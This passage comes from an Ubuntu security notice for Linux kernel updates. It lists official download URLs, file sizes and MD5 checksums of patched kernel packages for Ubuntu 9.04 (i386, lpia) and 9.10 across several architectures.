http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb
  Size/MD5:   673824 c36739d12d66db8de4b6e270b1c91464
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb
  Size/MD5:   676398 c7091523d59d0b1cdd4453e12d5983d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb
  Size/MD5: 24662186 cfa5f52488fb3767debfefaf8940f6b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb
  Size/MD5: 24777004 b524e2b45df5e9d30ebc81717b5c62d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb
  Size/MD5: 10250016 09b9af49da34304c1dd280896ce9c0cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb
  Size/MD5:   766288 4858bc3941dc0e545195c0b911142a4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   218106 f4f03360ad8e2ee23a58b534e8a2c045
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   174922 fbc6643612c01e91066a87b6ec9c7125
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    30064 c8e4db00aa9c0c3b75c47c103d87b4c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   262814 794c683379e359de14db8806fe984f78
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  2110070 da3e69dab278584e1abea5ee15d9b47d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   150230 7fc91b8ad535bfb705ba2cb2fc9ff57d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   184326 e505e555ac3bd0c33d00a47f7530f78c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   143584 209207f7e7887594a9d55d17bf1dca76
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    34576 cafc0f5f2db11f69d10e75815d3e9018
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:     5504 21cfbb5c1aa4c8d82bf3e1412646263f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    86018 0dc7720bee90887f4ebf5c71cf93d611
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    47636 fbebe71b83526192c08fd6d797ee8cb1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:     8714 14ed52e8c0a75151dd45acf3cb1ffc34
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    44692 27502a17d5ca35cc31a9fd79ae7d2f1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    14780 2c9ea91e8d8da2bff76c38a6cdce748d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  1445966 33fa2ee03c566924552fc5b413e2ccf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    44098 f740dcb377a692e2ff25a65424431e5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    69290 a7e3130530005bf8fe4edabe8b003888
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   119528 a12c1a5bf9a112402d80e8f77ee87a1c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    12678 6646096dee2575f3bb33510e70bdd52b

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   215260 9a096eefa7f5e423c60fea41c314b9a5
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    46664 ba3b534d98d6717395ec66b402b3c701
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    40958 5950f34ca1fbd16f82a42020bc934ec6
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    47312 0d7d48294720bbd387710d560756ce6a
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    86530 9e5c38cd42496250d5fcf951c6b5d4bd
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    33272 a8890faa31cf92122bcce2991374fe7e
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   523810 7b2a58ca4d024926c0f8101ab49242d6
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   125252 f48299cd45e2ef1a74017d1c7653976e
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    63568 135fe854fe31d2d8bd9cd09f40a266e5
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   300756 77668125ff976eaed45f3d2676a46c5f
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  3035296 186cc64995c4fd4404241de5399eb0fb
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb
  Size/MD5:   641460 1a4d29b73378acb8bcf88658f88dd08e
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb
  Size/MD5: 21796372 d7455e818bf972ef7eb0fe54b7bd96dc
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb
  Size/MD5:   766260 b67d9c1432185123449ed6826ed9588d
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   303982 80fe6dcf6d68a46047ef6ddc2c098614
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   157406 2cc8f76d83482452bb6073656a80b2ee
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    24442 28180da41edae2700e4c8a0e4f1c656f
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   260414 49a0b6bd418a0ff1d274ce8f602e2733
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  2027576 241ee9a564502f3d8837806d5e6480d0
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   149398 b14f79b842c979418dec65e273836cd0
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   184736 a159624d12831598d35c3b00ba563182
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   143238 2720ae4f8cdad85066fc888e7fc3c796
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    34462 582363a3843fdbded2476793775ace76
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     5496 67c7245d730a7b241eb9947afeef7669
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    85646 6a31ffe0054c27df1506ae34162ab79e
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    47402 ff41a000c4a3abbed18330e905a01b7b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     8718 15aa2d8fafced6b6e3b5a24c698b4089
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    63106 7a967940a04c1ee6a9626258e608b54c
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    14720 dc899d8630769d6270526c49f99a2af8
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  1447832 400eeba1e83569d777954b21b6df593c
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    43898 16b0a1310e3f70dccfc8d0d5f971b064
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   155186 b22b41e37f88fe49531f5580e0f7f712
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   172666 df244ff125096be469b1c56a30f1e05f
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     8154 f2d765541e008431b4d3eae00f435b61

Updated packages for Ubuntu 9.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc
  Size/MD5:     2450 610bb83247876f8a8b47a0fd0d46fae8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz
  Size/MD5: 87052080 62b9dcb9ad24e659db1aa085f9e5a456
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc
  Size/MD5:     1906 a39c7ff46fb3ff74480d0e98366a486d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz
  Size/MD5: 81902928 c9e88b4f386710c3f22979986a7e3a34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc
  Size/MD5:     1943 25176b20de251c2e58bb95e2dd9c1c7b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz
  Size/MD5: 82470873 4d5238d3d11105852133d3eb802a95cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz
  Size/MD5:  2811600 b2b44f12a786758d470e6a29c09d0388
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc
  Size/MD5:     3782 ae6bf5844769d00004b919a6f61d588c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb
  Size/MD5:  3790328 e35ab5c36ee1bac625d2a57bd19e0c5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb
  Size/MD5: 64258256 70b947cc9e9012c9472f2c317f11ffae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb
  Size/MD5:  9662096 ac58cebef695901ea01bc7413b79109f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb
  Size/MD5:  3791668 3836f273873fedf9d2293ee0d11df6ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb
  Size/MD5:  9531414 34d882276f33b0e37135c379a6e1c451
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb
  Size/MD5: 62161518 9d3f3f79b9f14db8bd3dc68594eb8c8c

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb
  Size/MD5:   603212 951db7e930eefc5fff9017c56badfb6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb
  Size/MD5: 18660056 e39dda7f87b093e927c34a928b842c7a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   221398 682a7dab5b571a7b2fd31f19daf724c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    15536 55206db30b20aea4d7da38b342fc095d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    52128 1cde23d38ba6908e1123951ef4bc3c69
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    44828 94402e34a45cf232ae86f3cc08bf7f4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    50072 65e128949b6f525d9028187fe1e7cc37
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    92518 338960088cec6b9b25ef2a96e96f3ebc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    37776 452d9c073d191ec2be1cad3aceb34490
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   537676 6bb8167794701151c613afe28a5c62c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   130666 ff5cf8923b89d0fa4b5c3c4a61ef93f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    53846 ffdc544c68e862a0a3038c99ac2d73a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   310118 c2092f9a83a4f59145005f2c451d304b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  4353666 3a04bb875ae70561075d05d5bb208977
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb
  Size/MD5:   694766 85017cb531a49ea743cb7b30341b5ffa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb
  Size/MD5:   694938 550a64d6d54ee5f34f1fb9eefbd4cc3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb
  Size/MD5: 28924984 3001e6d36f6bf76621997bdbeb864234
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb
  Size/MD5: 28885946 ff6296f4c684dd9facb011fc51b0b6f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb
  Size/MD5: 11740736 287948976d92a7cae832a34ce33a99b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb
  Size/MD5:   743052 35cb9d5d80b77a2586d08ffb65d3212a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   168272 fc4758b6b91802971538d3a3c519056d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   202768 73cfe4be43d350582d171ff0e178b6b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    27268 ae850a5e0ba4381a290b8f21ff88737f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   311688 3dab8c023e4aad0df74c5193aeaca49b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  2282064 f09b0e8828effab3770bfc1da159a8f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   158666 6765112bf6fed248c08465e47b4dab00
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   203112 fed91a4bc3d356a5a9bb1c6110337413
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   161072 faec6563ccef41e925482b36619fca7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    38056 505cbeb1fdbf55eea7664a19dcedc11f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:     5762 a3ba57f83594477b27886cb3f4bd1b0d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    73750 53978367ed22b3daba246878064b72c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    22240 8a1036af3dacffb432813cc8422f6ae8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:     9548 f1e71c2129cc33f1ff139401b7b81547
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    39844 48e4aa79753fdb3ce1877ca1817b9fc6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    23484 f1be46cb2947ebe6b6d2e5b571d71a35
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  1389556 2ba51ea53e5454f75c8b39f21481e45d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    47382 89f1dff9282f3c667cf1b8c2bc41353c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    51636 41311bd8c8459ba04789539733e6ff5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   128972 9697c034ed2bb74b5d18c5ae31fe1af0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    15814 8f46e8ddd6cac16dbdbc7c89cc94bee0

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb
  Size/MD5:   573528 fa913abed6caeb5c33eb2167f730956f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb
  Size/MD5: 17943372 803487f6122441604ec3062e7bb98228
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   198832 3282a330510666a582f6b8c0269d2f53
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    32458 03e2d90ce28677b7956fa2a72726d02e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    49938 c0d1953d9212f1569f04e8c8ba0db7ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    42118 db5bcc80727cd1013bc8393df2a88e4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    45954 2d497ad958e7e7fc1b57ce51ff6b3570
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    87386 8e3ab58cf14ac0e97a334a65ae3e42ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    33754 bdbf52c3d681cca0ecdced183d2d37c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   534176 5f166aa72d31a95df7cdb60abe4a0fc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   128172 821c97524ce74e0685b135140c5261d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    49748 9423b0562b984b85856d219d7b67fa27
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   295726 0736ef03d01a5e5e4fdf284ad2be5409
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  4185460 831a6068ef18d08ff697df14dead1668
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb
  Size/MD5:   674832 6c28f2a428900b7c3ecd857dd2363150
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb
  Size/MD5:   674164 daade678beff67e96da61f42286bb8d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb
  Size/MD5:   674252 0786c96b6d902a71c6f1a2e5aa202345
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb
  Size/MD5: 28775482 99e9b99d437aa88ec42e838367ca0c3b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb
  Size/MD5: 28938194 19d1d147a9e9dfb49fcd30b9d065d289
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb
  Size/MD5: 28836780 00047de0d649be8b91c813fe7ee482b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb
  Size/MD5: 11193984 1848c77671f6d9129f990e1a0a9940d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb
  Size/MD5:   743050 af6030dae8f05d7ef583ee7d6f31be8b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   172774 c11dd36baffeccf283ce48e122d7c791
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   186104 072e07c277b4f37611b21aad4390ccb0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    28372 82c8b14ef6982a48d3a8459d56ede43c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   292792 6c99c3b65ff7b159af94edf70358cb4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  2400232 94729dcb0c5adb15ded7b3302c4005eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   142004 9e43481b4e46409d8e711a628ce5e40a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   189566 83afe6de56cab613b4f890723a82a6b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   148522 b96767af921427e880579659ba7b757a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    35306 a6a1cbe7a75490632f24cad479916315
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:     6842 86b286685eabaf8b6d28d3f922249503
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    86058 c014cfa81ab99a01793d25b995c7d75f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    46424 d525bcf1a39f6a21f09d52d24e6a0eb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:     8916 f9efb7f192c3cc22c14df58803a64dfc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    36282 1d843fa9ef5beed8582f2924d0b53bcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    21660 3ad0b4572c12885957a3b753fc3b9fe3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
